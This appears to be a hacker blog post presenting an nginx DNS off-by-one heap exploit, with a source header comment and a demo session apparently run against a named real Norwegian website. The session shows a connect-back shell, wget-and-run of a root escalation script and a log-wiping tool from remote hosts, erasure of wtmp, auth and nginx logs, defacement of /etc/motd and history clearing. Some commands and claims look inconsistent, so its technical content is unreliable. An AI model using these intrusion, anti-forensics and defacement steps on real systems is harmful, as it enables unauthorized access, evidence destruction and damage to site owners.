NGINX <1.20 off-by-one remote heap exploit | The Diaries of Dr.Gonzo
First Seen: 05/07/2024
Last Indexed: 10/25/2024
So, the nginx off-by-one dns reply overflow bug died, and as per tradition: Notice the gift for Tofu at the very end :) Sure hope DNMsNO forum upgraded…

/* ngingonzo.c
 * NGINX DNS OFF-BY-ONE REMOTE HEAP DNS OVERFLOW (malloc chunk-chain-sled)
 *
 * priv8 * priv8 * priv8 * priv8 * priv8 * priv8 * priv8 * priv8 * priv8 * priv8 * priv8 *
 *
 * Due to the nature of web servers we can keep hammering
 * it until we are lined up next to a worthwhile byte to
 * overwrite data, DOP-teqneeq
 * (based on work by sgrakkyu, sd_, rocky, scrippie, halfdead, halvar & solar designer
 * and more). The most usable way is to fake the entire heap chunk and overwrite the next
 * chunk's meta data, but that means its location has to contain our shellcode or a
 * pointer to it.
 * The bug can be triggered by CNAME, NAME; QNAME and SRV answers.
 * CNAME provides us space for the overflow and storage for our shellcode
 * (as the reply to CNAME query's answer when it is inevitably looked up).
 * Will work on lots of TOR sites because of request smuggling and other forced lookups
 * typical to find on the dorkweb: most are misconfigured.
 *
 * Don't end up like dankam, mitnick, kingcope, ik, steveo (it's your fault I broke efnet:),
 * and so on.
 * bad boys, bad boys, whatch'a you gonna do when they come for you?
 * are you suggesting Ac1dB1tch3z should eat even more acid?
 * are you sure the world would survive that?
 * who cares?
 *
 * Yields UID 80/65535/nobody/nginx shell..after a lot of hammering. Tidy up after your mess!
 *
 * Testbeds:
 * poli******.no, etc.
 *
 * - punk | AB
 */

Action Bronson Demo

$ cc -o ngingonzo.c
$ ./ngingonzo -b -t 3 -s 0 -h www.politiforum.no -p 31337
OS Target: 3: Vanilla linux w/ ASLR 64bit AMD64
NGINX Target: 0: 1.20, 64bit
Method: bruteforce hammering (enabled due to fork():)
RCE Shellcode: Connect back, UDP
Test host: www.poli******zz.no
.. Found multiple A Reords: Cloudflare- Accounting for version misrepresentation.
**.67.1*3.**
**.**.48.15*
Hold while afraid.org DNS abuse is set up for us....
Verifying DNS propagation ... OK!
GO! Chicka-chicka-bow-wow ... ... b000m!
Connection incoming on UDP 31337
$ id; uname
uid=80(www) gid=80(www) groups=(web) Linux
$ wget -q https://www.p3.net/.notthefolderyouarelookingforanymore.stashnode/sudojudo.py
$ python sudojudo.py --full-auto
# SUDOJUDO: SUDO VS JUDO :)
# Bug info stolen from a some russians in my sniffer logs
# Exploit by punk
#
# Staging fight with race to corrupt control flow.....
# IPPON!!
# Match won, flawless victory. sudo ain't no match for my judo.
# Summer breeze makes me feel good!
# sudojudo.py selfdestruct with dd if=/dev/null of=sudojudo.py ..
# Done
#
# Enj00y!
# id; uname
uid=0(root) gid=0(root) groups=0(root) Linux
# echo pwnpwpwn.. er i mean nothing see here. there is no gonzo.
pwnpwpwn.. er i mean nothing see here. there is no gonzo.
# wget -q https://192.45.34.44/.tmps3cr35545.lollercoaster/evade.bin
# chmod +x evade.bin; ./evade.bin --target caller --garbage coredump --full-sweep --nginx --self
.:: Cleansing /var/log /var/run and reading nginx config to find log location
.:: WTMP... done.
.:: UTMPX ..done
.:: LASTLOG .. done.
.:: auth log .. DONE.
.:: Found nginx logs, overwritng core dump crash entries with : ....null bytes & unliking those sectors after sync...
.:: ......293 844 entries just went into thin air!
.:: CNGRTZ: We're NOT here! :) This "never happened".
# ..but you still don't that some things are more secret than simple drug use:
# echo "buhuhau iai kna not wirte elelr lse og tastalur har formange taster DNMsNO \
grammartardz. wr1t1ng iz h4rd n0t 0ps3c for you oN the SPECTRUM." >>/dev/null
# echo "#####################################################################" >> /etc/motd
# echo -e "\nRUSREFORM NÅ!!\n@pupp1, @stormglass, Sylvi Listhaug & Erna Fettberg VAR HER OG SUTRET OVER HELE MESSAGE OF THE DAY!\n" >> /etc/motd
# echo "###################################################################" >> /etc/motd
# nohup history -c && exit

Addendum

I have since removed all traces including the motd message, I was merely proving a point.

Dr.Gonzo

Judging a book by its cover makes for a small ignorant bubble in a very big world of wisdom you will never know.

Jun 9, 2021